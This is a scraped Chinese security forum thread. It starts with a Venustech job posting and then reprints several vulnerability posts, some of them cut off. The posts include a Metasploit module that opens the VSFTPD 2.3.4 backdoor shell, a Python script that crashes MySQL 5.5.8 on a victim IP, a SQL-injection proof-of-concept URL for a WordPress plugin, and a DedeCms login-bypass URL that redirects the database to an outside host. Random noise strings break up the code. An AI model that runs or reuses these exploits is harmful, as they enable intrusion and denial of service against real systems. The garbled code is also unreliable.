最近看过此主题的会员

返回列表 发帖

[人才招聘] [招聘] 启明星辰研发招聘

  • 招聘职位: 其他职位
  • 公司名称: 启明星辰
  • 工作地点: 北京
  • 专业要求: 其他 
  • 学历要求: 本科
  • 工作经验: 2年以上
  • 职位薪金: 面议
  • 年龄要求: 不限
  • 性别要求: 不限 
  • 公司网址: http://www.venustech.com.cn
  • 简历邮箱: xiaoyan@sitedirsec.com
  • 联系电话: 00000000000
  • 在线QQ:
  • 安全助手: 通过非安全中国管理人员招聘/求职,QQ群:57116771


  • ++++++++++启明星辰相关说明++++++++++

    站内发信给我就行了。
    ' F7 _, s& g! q) s* z
    9 G4 t7 g8 z! O  k

    一、研发中心:Linux C软件工程师(若干)

    岗位职责:

    1.
    / Q" C$ k# C* _1 x安全网关,防火墙,IPS等嵌入式设备软件开发,维护

    岗位要求:

    1.% y7 O0 l9 O0 R1 b$ A' V/ M8 J
    精通C语言编程

    2.  a& r9 G$ m, T6 j" Q
    熟练使用Linux操作系统,精通 Linux下C语言编程

    3.: U3 `4 ]2 M7 k/ f! C4 m
    精通TCP /IP 等网络协议,熟悉应用层协议,及协议分析

    4.
    4 @2 C' Q- E9 q" W熟悉网络安全协议及路由器、交换机、防火墙等安全设备

    5.
      [5 j2 X$ _, A" S/ {' C熟悉Linux内核及开发

    二、研发中心:测试工程师(若干)

    岗位职责:

    1.9 G! O# E6 z6 S5 Z6 v# u
    负责产品的系统测试、集成测试工作

    2.
    & e, }5 {7 D1 A) R, D+ l负责产品用例的编写,执行、修改

    3.
    5 z) `# e% G0 n$ p  T负责产品性能的测试

    4.5 _2 v( Q6 a, r' Q
    负责对外项目的支持和测试工作

    岗位要求:

    1.* s1 A9 C2 z% a% x/ V* Q% l
    掌握基本的tcp/ip知识

    2.2 J% [0 w; i# ^1 O$ `' J, N- W( |
    数通基础好

    3.# A+ {, ^& j1 C
    对linux有一定的基础

    4./ l! \; s, _! q2 Q
    掌握数据库的搭建和使用

    5.. T9 q* w0 ?$ B& l; O
    至少熟悉一种编程语言C/Perl/VBS/TCL

    6.  w9 U3 O( a% C( z: X# g1 C
    熟悉测试用例设计,熟悉系统测试,熟悉压力测试

    7.8 A% J' Q+ l! w- \# `( ]
    熟悉防火墙相关原理,对于防火墙的一些功能特性有一定的了解

    8.% s2 p  j! }4 a
    对网络安全设备在网络中的部署有一定的认识

    9.
    & E3 y( H" E7 t3 ~9 p; W. y掌握测试工具的使用:Loadrunner、包分析软件、思博伦或IXIA的测试仪

    三、研发中心:安全事件工程师(若干)

    岗位职责:              

    1.! m- i; E1 n" y0 }( @# n
    木&马检测服务、WEB漏洞扫描服务的实施

    2.7 D7 K3 H6 c, a9 Y
    对服务客户的技术支持

    3.) ~' v9 p. W' `9 ^
    对于网页木&马,WEB漏洞、蠕虫、扫描、拒绝服务、缓冲溢出等的研究

    4.
    - V# `6 l; N. e/ P
    对IDS/IPS/UTM/TDS/WAG/322等产品的安全事件库进行日常升级和维护

    5.
    5 G6 C$ V: t" {" S
    对各种攻击手段的研究;TCP/IP协议的研究;逆向工程的研究

     

    您可能还想看的主题:

    启明星辰招聘

    非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
    2、本话题由:小妍发表,本帖发表者小妍符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
    3、其他单位或个人使用、转载或引用本帖时必须征得发表者小妍和本站的同意;
    4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
    5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
    6、本站管理员和版主有权不事先通知发帖者而删除本文。
    收藏 分享

    VSFTPD v2.3.4 Backdoor 命令执行漏洞
    ################################################# $Id: vsftpd_234_backdoor.rb 13099 2011-07-05 05:20:47Z hdm $    ## This file is part of the Metasploit Framework and may be subject to      ## redistribution and commercial restrictions. Please see the Metasploit     ## Framework web site for more information on licensing and terms of use.# http://metasploit.com/framework/                                                    #################################################
    5 y, l5 v8 q# L8 w& \% k7 B1 k4 q; `# I, z3 ?

    + o1 q: Q$ |0 b* {/ s: P  }: K4 n4 a* q. P
    require msf/core
    * b1 {( ~0 W9 @4 t
      V& H6 ?. Q" g8 ~4 A2 mclass Metasploit3 < Msf::Exploit::Remote6 o  v3 E3 C& o: l4 d
    Rank = ExcellentRanking% }: w" l% I' j  S3 E
    3 q2 H; Z' g6 h. g; z/ n" K+ M( P
    include Msf::Exploit::Remote::Tcp; @  v8 h, K; _! w+ b' Q3 {1 ?' F" k

    / M+ z+ e  S. sdef initialize(info = {})
    * F( ?3 j5 S. m/ Osuper(update_info(info
    # x1 I! d- s  ~: m1 EName => VSFTPD v2.3.4 Backdoor Command Execution
    - X9 D; e2 J% X" ^Descript_ion => %q{, \/ u2 y# h$ i6 k8 M6 E
    This module exploits a malicious backdoor that was added to the VSFTPD download( |/ _# v  q6 N: l5 h: C% L  P
    archive. This backdoor was introdcued into the vsftpd-2.3.4.tar.gz archive between  y; \$ S1 o$ B
    June 30th 2011 and July 1st 2011 according to the most recent information7 P0 ]# @& N; R
    available. This backdoor was removed on July 3rd 2011./ ^; B8 m& [; ?6 G1 U. ^
    }, r4 p* e8 }! I# e1 h: ^0 C
    Author => [ hdm mc ]
    & B, h% H% d% o7 ?License => MSF_LICENSE# Q4 C0 Z  w& v
    Version => $Revision: 13099 $
    1 y5 q9 n0 T. m* J- ?$ S1 XReferences =>% K. h/ i1 S, G& M. R0 N) p2 b
    [
    ; m1 s( \$ ~. T' i& ?[ URL http://pastebin.com/AetT9sS5]) h' v) |2 P5 v! ]  l, I2 X: X
    [ URL http://scarybeastsecurity.blogspot.com/2011/07/_(使用时去掉_)alert-vsftpd-download-backdoored.html ]
    2 Q5 u' o9 z. u]
    ( R8 Y. i: D5 N( F- HPrivileged => true/ s# g  N4 R( _  `! u
    Platform => [ unix ]
    ' u+ ?) Z2 o3 [/ U& X$ A5 j1 TArch => ARCH_CMD
    4 ~% z9 e: F- ]/ V2 tPayload =>
    % S9 p5 d5 f8 k& x- Y. ^( F{
    $ Y  \/ ?6 R2 [" }Space => 2000) [  |! \' D) z1 {7 L( M+ u' p- L
    BadChars => + N( R% m; [$ [: _- r) X4 U
    DisableNops => true
    ( B4 Q9 c8 [" BCompat =>
    * m; f5 s0 h( H{
    8 W& M+ E: C5 z! z, v3 rPayloadType => cmd_interact; Z. B% G7 a* L) [
    ConnectionType => find! N% z2 L7 S4 w* j1 x  e5 o
    }
    + D0 r# i$ U+ ?% E}
    8 x% o4 T5 C( y) q$ {3 XTargets =>
    7 N, N# Q6 D& h& U+ K2 Y[
    ; `; t5 ^, Z& f; Z& C, u[ Automatic { } ]
    6 V; c- e" ~& T( x]
    - t" l3 P* u9 e  S. k( i4 B, W% KDisclosureDate => Jul 3 2011
    & Y$ S2 @* x% BDefaultTarget => 0)). r7 G& V( Z- s+ `: L8 G% v

    ; ~7 C: h+ N! R; J7 V  L. I0 h' ]- x0 iregister_options([ Opt::RPORT(21) ] self.class)* P6 z0 x/ \" G( U
    end" j$ e! b7 L6 |+ O! m5 b9 F

    6 ~( r- l, u0 q8 ~  Z" vdef exploit
    * _* u. c& q' `, d& \; N6 |8 B7 u. Q2 u2 [- }; c* D
    nsock = self.connect(false {RPORT => 6200}) rescue nil4 Z. _7 q( K3 ?% W! f) c& W
    if nsock* U3 V- w, H1 p) j7 D
    print_status(The port used by the backdoor bind listener is already open)3 F- {. X! P$ F
    handle_backdoor(nsock)4 V, i; u$ L# R
    return: o- W, X0 p6 ^1 ^$ V) q
    end
    : I, W, o: L, c1 c1 C
    . a8 \) L( @& }/ Q$ N# Connect to the FTP service port first
    . @9 ]7 _! u4 b1 D% k) t: X0 Q* kconnect
    7 `0 V/ J4 M( U/ G. m, y
    $ P% |  [& X& x% t; pbanner = sock.get_once(-1 30).to_s
      ^0 h! J% q# G& m) t. `print_status(Banner: #{banner.strip})
    + i5 ^$ p2 X1 r+ X% |# {) ~; M; a- F" Q' Y: L: [  x
    sock.put(USER #{rand_text_alphanumeric(rand(6)+1)}:)* `! B4 R- Y; o& _9 N: ?# J
    )1 f0 S- V1 O$ Y
    resp = sock.get_once(-1 30).to_s' `% V' G) H# R$ {( R
    print_status(USER: #{resp.strip})
    - b# j: c' I* A- ?. p
    * G# ~) j- ^+ z- q: H- aif resp =~ /^530 /7 M* p$ _' I. `, d, \5 N" m: W
    print_error(This server is configured for anonymous only and the backdoor code cannot be reached)) C; ^; x5 H5 J4 P. D  }' M
    disconnect
    3 V4 E: k3 v* r* k$ c/ W( `, treturn
    4 v1 T0 G8 s4 c6 n8 }$ Fend. \& ?8 ]$ r, Q+ Z5 W
    - q* s) m! G; P0 B4 W, j& s4 U% |! q2 G
    if resp !~ /^331 /: b% |0 g; `; W) `! R7 n) g, _# W
    print_error(This server did not respond as expected: #{resp.strip})( g. C4 U9 [& t6 Y/ T
    disconnect
    4 l2 `  ]+ `5 m' treturn
    2 w  o  n) H, S8 L! t5 S0 cend
    ; Q5 J' {( l6 w3 y( r
    ) O0 W9 x' ]1 m. @% hsock.put(PASS #{rand_text_alphanumeric(rand(6)+1)}6 R4 `" x& q! p+ x
    )
    1 R0 M' M0 G, \0 J: s. j
    ' e/ _% A/ J7 V8 q  E8 c; N# Do not bother reading the response from password just try the backdoor  x2 q4 s2 N: [1 u
    nsock = self.connect(false {RPORT => 6200}) rescue nil
    & g& e4 F2 t0 Q9 ?$ @if nsock9 S4 s. x5 a- H
    print_good(Backdoor service has been spawned handling...)% M' i9 c' n7 _3 u
    handle_backdoor(nsock)
    8 h, n& l' ~2 z$ ]return
    # |. Z5 @# p, f! m1 `end
    ) d6 R; M8 v4 s0 ?- u8 i
    / o# W# a4 v( k) Ydisconnect
      ^2 A1 c) Y- o/ `3 I4 a5 B$ {
    1 g* Z1 G: g: W) Kend
    " M+ y8 `3 W% U0 Z: o# m4 |1 F  `' Q# [& t7 N0 x: \( Y* f( I0 L
    def handle_backdoor(s)
      B" t+ M4 {$ L1 w0 L
    ) o2 J& p$ N: X2 as.put(id! b& a' f9 s& H( d
    )
    2 y  F" C) j  ]9 \( F" s: S; W3 L2 ^, T' _
    r = s.get_once(-1 5).to_s
    ( b, z! ?- [  Gif r !~ /uid=/
    # z7 {$ h4 j3 U/ B  C6 m3 F5 K  b4 }print_error(The service on port 6200 does not appear to be a shell)
    1 n( a2 [+ Q8 J" S) O$ H0 ndisconnect(s). j( q& B7 s7 A* Y4 U! y
    return( h+ v" _6 b) [% N3 y$ u" h( H" y
    end
    - y; W- x# N' b6 e9 G& g1 O+ ^/ v+ K
    " t3 S% G1 C. l) u. pprint_good(UID: #{r.strip})
    & ?. H3 }) H9 s) O8 i8 Q& r" [* q' ?5 D
    s.put(nohup  + payload.encoded +  >/dev/null 2>&amp;1)7 b9 O; \' K' f7 Q, _! K8 c
    handler(s)5 K0 I/ G! x+ R* l
    end
    - X- y8 d7 `- ~8 {+ D0 i% M
    # ~# N/ p: @' O* {3 D& `/ Vend复制代码
    8 C6 V. }4 c. D, _& l5 E; l. c$ E" n3 P. n5 Z2 k/ H0 ^

    # h: L" F0 P) ?4 h+ J, W0 I( G/ c2 s& h: X  C
    . ?. R2 z9 l" X

    ; {3 b1 N1 Z3 w( q
    - F8 C, V' A3 J; ]1 p- u2 y5 H- p5 [
    4 T% A3 K- [: i9 [) N0 ~3 R. ^9 a6 {- C8 ]! z0 A( R

    8 d( p6 i5 M* g1 h# u% ~4 Z8 r3 Y  ?0 f+ f4 X6 W
    9 @. b; c4 w$ K$ O# _/ t* F

    2 a& j9 n2 P2 v# @5 Y/ _3 D3 X3 ~  F% D8 B. p# _
    0 d* q3 O( ?& B2 T! J+ S7 e9 g. T3 f" j

    6 ^2 c. j( U0 }- n5 J- @0 V% Y8 d' V) `8 L9 v" c

    & C4 E, n6 O4 D% o, u+ B3 H
    " o. Z* J( W8 L公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    WordPress Event List Plugin <= 0.7.8 - SQL 注入漏洞
    1. Description:
    2 v: ]2 h0 `4 ^# W' n; |0 Q  
    . p" W) y) @/ a     
    & ~" ^) V% j: c  
    ! d0 }* k3 A5 J& i, WSQL injection vulnerability in the Event List plugin 0.7.8 for WordPress
    # v, B; z9 a2 Fallows an authenticated user to execute arbitrary SQL commands via the id; O+ a* U; |: o
    parameter to wp-admin/admin.php. 2 p6 h9 g1 L. r- z- P  c7 G
      0 S) Y" u1 Z4 I9 n( v, V- a
       
    $ S0 h- X. o& {' ~7 r  5 w1 b. {- o  |; \# R8 v
    2. Proof of Concept:9 P6 z' @6 X' Y  h* x
      & n# e. o! M/ P. l0 e" J
       
    9 a0 B0 k0 H; v  
    6 U% e  f( d+ j' g0 Qhttp://[wordpress_site]/wp-admin/admin.php?page=el_admin_main&amp;action=edit&amp;id$ A1 e" U1 Y7 ]0 u
    =1 AND SLEEP(10)
    ; A, ]+ F8 }! G% q
    1 s1 r9 ?1 C/ q: q( |" h  m; E* p  
    & S- Y2 O: r; Y   
    ' K! k& c* n, Y' d0 A$ d# D3 {  
    : E( `) u* o. J/ k7 K/ `3. Solution:
    , i' f4 b+ {& p4 L6 a2 Y  
    ) v) \: e# x# i& r" w     
    1 B$ m3 U2 s& R. A  , }1 j; N0 K$ L* e: ]6 F6 [5 {8 ?9 O
    The plugin has been removed from WordPress. Deactivate the plug-in and wait* f! J/ {1 _. W8 L$ [/ A3 _3 `
    for a hotfix.; Z& y; R! r$ g/ |& h
      
    8 w" Y% y& P6 Z. W! z+ `) F   
    . u  I2 ]; {7 A& F  
    2 A! q( W& A5 M8 P: c2 C( ?/ O4. Reference:5 E7 S' h  [% M' P4 I
      1 Z# W# K. g/ n4 i4 X- _
       ; G# y8 u6 }& N1 |- g# `  w. S
      ; d9 y. t8 V3 X5 L
    http://dtsa.eu/cve-2017-9429-event-list-version-v-0-7-8-blind-based-sql-inje$ `" |. x( Q' V+ m8 R
    ction-sqli/- T5 |4 b, W8 i! X4 d) z, C
      % @2 ~& |  t! o' y
    http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-94296 i& R: p& z  T/ g  V# c; a
    0 I+ B8 Q0 v$ Z8 |% V+ N! ?7 t$ u# y

    1 l2 I9 N1 ~; C$ K1 J
    9 F/ d) J9 [* {3 |0 \# _: e1 {2 [# }/ u

    2 ^* V- K3 c: V0 A  ]  \& B9 s3 i3 ^

    9 {3 R( z7 f2 P/ i; f% Y- j$ v$ O% R+ s

    ) @% U% R$ s4 L! f5 s" T$ e3 d1 g, L6 b- {3 U+ X8 I

    ! b. Y6 N0 g7 K% P! N' @2 _4 k! y3 F1 z
    ! b# p4 G% H/ N7 T
    1 W1 _( o1 N+ C# z/ K) F
    ; F3 G: J; f+ q4 Z' o) p$ G$ x( S( s6 o
    $ n8 w( F1 Y$ O+ P* `0 T4 t

    , W% W! N* c5 g  i! U  ]1 U: E* Z" L
    ) e: I  ^/ K0 A% P4 a公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    MySQL 5.5.8 远程拒绝服务漏洞
    import socket, sys
    7 [* ]& ?: h& D/ D0 I5 Y: U
    % j3 W; Z" ~" K+ U/ G; Z' n- U3 Sprint "
    , F, L' ^# G* j7 k5 R"  N, W9 n& {2 c/ a
    print "----------------------------------------------------------------"
    * [0 o8 |, W+ O" _" Tprint "| MySQL 5.5.8 Null Ptr (windows)                                |"# y" I" a! }; e0 k' ^
    print "| Level Smash the Stack                                         |"* C9 d- o3 H$ A& n( w( T
    print "----------------------------------------------------------------"9 f0 f& k& v3 I9 l
    print "# c/ J9 c- U8 Y) G4 Q& G+ H3 h' E
    "
    ) u  x4 [, f, k/ A
    ; {2 ^* |* f& ]7 M! nbuf=("&amp;x00x00x01x85xa2x03x00x00x00x00@x93x00x00x00x00x00x00x00x00"" @. d& Y) D% Y& j& |! O% p: l  H
    "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00rootx00x00")
    5 y7 L; r& u' C9 O& c . I) w  o& ~) P% L
    buf2=("x11x00x00x00x03set autocommit30")$ A/ `+ s+ p+ f, i/ z* S  \* O

    9 P6 F' U/ y. i. e" _$ m5 S4 B) J( b$ Vdef usage():, G8 s: e" v. W5 q  |
    print "usage : ./mysql.py <victim_ip>"
    2 d' o& K7 `4 z" Eprint "example: ./mysql.py 192.168.1.22"7 {* O: E1 a% b( J1 H. R
    3 F! a9 c! N8 {. Q
    2 X1 l" y: R! _
    def main():% \2 V3 X/ H, j! {$ X
    if len(sys.argv) != 2:
    9 E0 b: \5 p. n: g, ~# Fusage()3 R4 R3 ?4 M# A" ?
    sys.exit()
    & B8 A, s( E& F$ J9 E4 Q3 Z: As = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    : y9 ~: {  G% N9 N, h- z
    + K. i) Z" Z5 `) a2 H- z: @HOST = sys.argv[1]
    - M6 D9 O  S) |PORT = int(3306)
    : b' N( i: E/ m. is.connect((HOST,PORT))' O9 I. D0 b( B  p5 r
    print "
  • Connect"
    1 b- ?, E8 `3 r6 S$ r3 bs.send(buf)
    2 d  _6 Q+ R8 [1 n% ]. Hprint "
  • Payload 1 sent"3 [2 X7 K! J3 {
    s.send(buf2); j1 o7 M  C8 h; h1 B+ U5 L
    print "
  • Payload 2 sent
    % H, Y8 o& |$ s7 q: u/ t1 K. k; K", "
  • Run again to ensure it is down../ G& k8 }+ w6 D
    "
    0 y7 y: ]% \+ f1 H* l/ }s.close()$ v- j# |: N3 J* G' k+ k

    4 f  k* r" t1 Y  L1 Tif __name__ == "__main__":+ j8 Y3 s+ A9 p
    main()
    0 ~9 @' R$ N. B! H$ C7 e- T4 M' C) R7 c$ [  z, b  I

    & C9 P6 s" Y! p- s; |
    - S8 N* v7 C1 K0 Y0 H7 D. ~
      h6 A8 x+ X8 T( m' K1 A- G, L  J' R* D/ n
    8 C" c& T( V% L: t) G

    : y0 ]4 `2 V/ k: _4 p
    2 X' x4 p: j4 T( ^- ]' n# _5 h7 b" I- [1 N( `+ A, b

    8 F6 P" u2 C* Z0 d' W
    6 q8 w5 w, q  T8 D  `
    , g* ]- ~- ^5 ]6 E% s+ x0 n5 V' K2 s4 s" Y2 S: M

    9 D  I" A3 n* c2 i. L
    3 r: j/ J6 w: _1 e3 n- ?$ d. E
    * g( v( E$ o3 L/ Y2 D3 s3 n8 w/ S) m/ N

    + M: g8 g  S7 ^5 @9 _& ?3 z- e% s% z公告:https://www.sitedirsec.com公布最新漏洞,请关注
  • TOP

    手把手教你装Linux系统-设置虚拟机
    % L5 p5 a8 o3 O7 a+ a7 t" Y9 B
    http://www.sitedir.com.cn/video/4.swf9 o. C. H3 E" C+ D2 w( Q/ z2 t+ Y

    3 g- R9 ?. @( ]) g7 J2 j# ~! F0 m! `  J# U# f* I7 ]
    5 Z7 J& u8 G6 \* b! ^9 U3 T9 y

    " ^6 m' ~# m! E: k; v$ u) }
    - f. X0 u& p! I( L7 \1 ]8 ~  q" p" [3 b1 n; a1 f6 d

    2 @$ [% ~$ Q2 ^
    : n+ Q- K" L% y) B
    # O  R5 n1 u9 I- n: E9 s  t* r
    3 R* I( B6 B0 Q7 k& X, b% p0 v# z6 K! a: a

    % ~" `' `: q9 L0 B) y' s7 ^0 C# W6 k$ y0 ^, f2 o- W- H4 D( Q" F

    # C5 `8 H8 |+ j8 k  W7 ]! b" B0 G# p. x+ r3 Z9 k

    $ D7 x8 W' X+ \1 _: {* X% P! f& F- w. s. G" `
    / }# Q  i/ Y8 l# v, A
    公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    织梦(DedeCms) v5.6-5.7 越权访问漏洞
    http://www.XXXX.com/织梦网站后台/login.php?dopost=login&amp;validate=dcug&amp;userid=admin&amp;pwd=inimda&amp;_POST[GLOBALS][cfg_dbhost]=116.255.183.90&amp;_POST[GLOBALS][cfg_dbuser]=root&amp;_POST[GLOBALS][cfg_dbpwd]=r0t0&amp;_POST[GLOBALS][cfg_dbname]=root
    # y) [0 ?" T: U" Z, `
    把上面validate=dcug改为当前的验证码,即可直接进入网站后台

    / j/ \  J/ y# [+ x
    此漏洞的前提是必须得到后台路径才能实现

    & S* o3 N* e* _8 L0 g
    官方临时解决办法:
    0 L( q" P% m4 p4 q
    找到include/common.inc.php文件,把:
    , l2 {) p1 @! C+ q! S1 [$ Y
        foreach($_REQUEST as $_k=>$_v)
    - F1 \/ _! y  Q' K+ m. Z    {
    9 F2 d" Q; Q0 `8 e: c, v3 I1 R5 q        var_dump($_k);
    9 a8 T/ ?; J! H: n! c        if( strlen($_k)>0 &amp;&amp; preg_match('#^(cfg_|GLOBALS)#',$_k) )3 s2 V* O  ]( K! I8 Z; t
            {* J, ?3 C/ r) m; n* k, s. |4 B: H# T: H
                exit('Request var not allow!');
    3 c! |1 r8 s0 c% C% ?  ^/ `) S: H        }) |- k+ |1 D  z4 Z, ^
        }

    7 E, w6 R4 i, e, j- A$ [
    换成:

    : f1 V& F, f3 g
        //检查和注册外部提交的变量
    , v) E7 i2 P5 @! Q    function CheckRequest(&amp;$val) {7 _3 Z: q5 |$ A' {' R
            if (is_array($val)) {
    9 v" ]% I! _3 `: l+ |( `            foreach ($val as $_k=>$_v) {, Q/ m5 a2 s) c' W7 J& t9 S
                    CheckRequest($_k);
    . P+ f3 G  @7 o$ A                CheckRequest($val[$_k]);
    & z  r' U! f; ^2 w$ Z            }; l7 ^; s+ m# [0 I8 [4 A
            } else
    / Z, F6 C; {, {  M. p  `( G3 Z        {
    ; n$ v; `) W. U7 x" e( V( F            if( strlen($val)>0 &amp;&amp; preg_match('#^(cfg_|GLOBALS)#',$val) )* T; x8 d8 P' f5 z
                {
    $ B. I( m# q; i                exit('Request var not allow!');
    : `% N! Z& ]1 W( P) n3 v) @            }
    8 M: l7 I2 n7 M% @: j        }+ d7 [; ~; S0 ~4 e/ Y/ ?7 T
        }
    9 o8 [  ]# I1 a9 v" M9 Z' R4 x3 g    CheckRequest($_REQUEST);4 P/ |  H& J1 t2 U  o& P  P
    / Z- R6 F4 e2 t4 B. Y2 @4 [! S, M

    ' m* |9 J( S/ [, [4 E
    % M% g) Y9 a0 T8 a, l& E& U
    % e2 w- Z  y5 {0 q& n. K1 D0 _( M# Z" k& Q; q. H5 Z: Y, R

    ) Z2 c$ b5 \. ?/ a: H  b! l' Z( n7 t* w* ]5 V3 x

    6 ^8 z2 x1 |( i! W8 `! h1 o. j
    & s: ^5 w9 [; A0 g* W# \2 t1 V5 S: I% i4 L0 ?# U6 I" i2 l2 o! X
      l% _! j  n& i

    & J" z" d# o1 ~% y2 H4 T0 T0 \0 u
    & d- o: ]4 Y6 r+ p6 K4 T0 a/ x
      R+ ^8 r3 b$ L7 Z6 Q# p6 `: n; X4 x  u) F; w% y9 F3 o

    + U1 @* A+ O. `. J* I( E0 B6 P+ u2 W  z1 e& A7 l

    ' \4 n9 ?+ J  j1 p
    # T  k" r7 P7 k" Z8 d2 \公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    手把手教你装Linux系统-设置虚拟机工具
    <P align=center>- L# S, h& g( r# i8 c

    9 P- A" i& N3 F4 V- Dhttp://www.sitedir.com.cn/video/8.swf[/quote]
    6 v. O, D; J7 y3 o3 C; F6 t0 I! k! E7 R8 k$ b* w; X
    5 C8 `* k2 ^, @
    " L9 ^/ @6 Y) s! |) m
      S0 m& d0 p( W) V% Y: U' H+ q
      k/ A5 S( ]$ I4 q# |0 V

    - T) t) a1 U* {/ ?6 y8 B/ u
    # W7 u8 P% H: ~  |( F
    $ K  @9 {, ]: o  A6 |) K! ^0 [$ s# f' c2 h2 Q+ O

    3 v' w4 |; m. D
    : i7 j6 a$ |1 r$ `; Y* t3 [1 p3 u8 f4 y. K
    / B3 X! E) \1 M5 [) Q4 P

    0 E; E: m% G. t1 ~; Q6 X2 X: B) Z9 A' T

    4 |1 w, ]* P; O+ X% s
    * T- w. l" T2 L
      J* Z4 d% d3 x* g/ C% f) e公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    Django开发框架多个安全漏洞
    发布时间: 2011-09-12
    8 m# Z2 I  R/ R
    影响版本:9 X0 G. `8 s( F6 R. v' O; Q
    Django 1.2.56 {9 q; O0 @' l. ?* o
    Django 1.3 beta 14 C$ {1 ]" B7 m+ u' x
    Django 1.2.4. z( G$ R0 A/ d5 W6 M0 d
    Django 1.2.2# o! a8 l# F! {/ b+ Y
    Django 1.2

    5 K* y7 q$ l: k
    漏洞描述:
    , m+ y6 S/ m; e8 X: x0 J. q
    Django是一款开放源代码的Web应用框架,由Python写成。
    + R' M. o+ F+ R) IDjango存在多个安全漏洞,允许攻击者获得敏感信息,操作数据,进行缓存毒药攻击或进行拒绝服务攻击。) w' q& a% z! C
    1)当使用缓存后端时django.contrib.sessions中处理会话存在错误,可被利用操作会话信息。要成功个利用漏洞需要已知会话KEY和应用程序允许攻击者使用合法会话KEY储存字典类对象到缓冲中。
    % ~0 A$ C- q* j/ Y2)Django模型系统包括一个字段类型-- URLField --,用于校验提供的值是否为合法URL,如果布尔关键字参数verify_exists为真,会尝试校验提供的URL并解析。默认情况下,底层套接字没有超时设置,攻击者可以利用此漏洞发送特制URL消耗所有服务器内存,造成拒绝服务攻击。
    * H2 n' P) F  S! r$ S) ^  _3)当校验提供给"URLField"字段类型的URLs处理重定向应答存在错误,攻击者可以利用此漏洞把重定向应答返回给"file://" URL,可判断服务器上的本地文件是否存在。- q% N  X0 P! N4 }) B4 L% A
    4)当生成重定向应答的全路径URL时处理"X-Forwarded-Host" HTTP头存在错误,攻击者可以利用此漏洞进行缓存毒药攻击。
    7 ~% M: z( c+ p  X8 _
    细节参考: , Z( `9 C6 u9 p# a+ }* G
    https://www.djangoproject.com/weblog/2011/sep/09/security-releases-issued/
    5 V, K; R8 q2 `http://secunia.com/advisories/45939/
    7 J" H! B' D$ G$ ~# l
    % s& f' C* ~% O- p0 U! d

    8 V  _. v7 f  s# x. I+ t& I. t: y/ U4 }, _8 M

    ; ?" q6 ^3 U- f1 n% V2 o. ]* f: j! i% l
    , E5 T. c- P8 |) @4 z+ }% ~
    5 V. G. ]3 ], e! I2 n

    8 q5 Z5 A! d, |3 `4 |/ ?% P3 M9 c4 c$ k
    8 w* O/ F. g6 L7 l$ t

    9 Q+ x# s. n* x1 g- m; [& W$ H1 b  r7 W8 G) N
      Y* h. _" f, {" Y+ P$ @
    9 [- n' L4 W% \( E( ]1 b% Q

    ; T% R! F! \$ Z7 _8 ]- F1 N) Z4 y- F$ r6 ~7 h- G6 `. e
    / [. l- E, f4 o+ j$ X8 n1 I- O9 D

    - X4 r( m4 ~. J7 O1 T8 f' d. L- Y1 n! ~8 Y  T& G
    公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    McAfee LinuxShield 本地/远程代码执行漏洞
    McAfee LinuxShield remote/local code4 B1 j& ~8 x8 g: p
    影响版本: McAfee LinuxShield <= 1.5.1
    ! {' N% i/ t; V3 ~4 @远程攻击: Yes
    ( @# c; S1 i) U- y$ m, {本地溢出: Yes' l4 N; t( T+ ^2 R
    背景阅读:
    7 K, `1 Q/ [/ v* d- d===========3 Q3 E  U# s( q# I" w) o/ b$ }3 q

    ! e: K% x) }- l5 V0 ]! v  kLinuxShield detects and removes viruses and other potentially unwanted
    5 G; N9 C  Z8 E* x$ v' j7 gsoftware on Linux-based systems. LinuxShield uses the powerful McAfee& f6 R& R: S1 T
    scanning engine ?&amp;#65533;&amp;#65533; the engine common to all our7 N. z$ S2 @3 O+ E- Y9 T, f; W
    anti-virus products.- I5 c2 a% w/ q6 E' |8 Q  ~
    ; j6 }" v0 B' D0 M& U9 l
    Although a few years ago, the Linux operating system was considered a
    " T& V' ]; t% h) J3 {secure environment, it is now seeing more occurrences of software) N3 B! ^6 h1 Z$ ?
    specifically written to attack or exploit security weaknesses in# d" Z! N+ i3 |, T4 Z9 j
    Linux-based systems. Increasingly, Linux-based systems interact with
    + _$ i! \3 j  }* D3 D+ MWindows-based computers. Although viruses written to attack Windows-. v: c2 _  W0 u: q! ^
    based systems do not directly attack Linux systems, a Linux server
    / N1 s4 J' P( _" L4 Zcan harbor these viruses, ready to infect any client that connects to
    9 ]/ F; j3 ]% ]it.% e/ `4 j% t: d0 S% B7 r0 u

    9 q, X: r1 m2 |4 RWhen installed on your Linux systems, LinuxShield provides protection5 W# M' p) [7 x* L% h" X) p7 a2 p
    against viruses, Trojan horses, and other types of potentially" _, B' N/ i' d( a
    unwanted software.5 z6 Q: R1 u" j

    8 d8 A+ S$ @* m" I, t, v+ xLinuxShield scans files as they are opened and closed: q4 c  y5 i( Q: U/ R% p
    ?&amp;#65533;&amp;#65533; a technique, S! f5 J0 R7 C) q
    known as on-access scanning. LinuxShield also incorporates an
    ! y3 `3 p" l. r0 Z) hon-demand scanner that enables you to scan any directory or file in& U9 ?1 T; D. c" y
    your host at any time.( E$ f" M7 P+ p2 Y' L& p
    1 C. a9 t3 W! x7 J+ G
    When kept up-to-date with the latest virus-definition (DAT) files,
    ' n/ W1 n6 @- m" Z6 m& c" gLinuxShield is an important part of your network security. We- }0 B& o& d4 r. I
    recommend that you set up an anti-virus security policy for your3 I/ V* |1 H$ m3 R9 x& y2 A
    network, incorporating as many protective measures as possible.
    " m7 K, ^' @. {& t* R
    & I, f7 {; q9 Z* `; k0 ~$ \LinuxShield uses a web-browser interface, and a large number of
    . s9 S8 I. j9 l) y- HLinuxShield installations can be centrally controlled by ePolicy. ]' V  U- Z+ t0 m3 X9 ^
    Orchestrator.4 p3 V$ d* D; [; X$ c& e, O
    + _( H5 w& R7 e! k/ L
    (Product description from LinuxShield Product Guide)
    8 O1 _& J* k) t* K( p3 ~( e
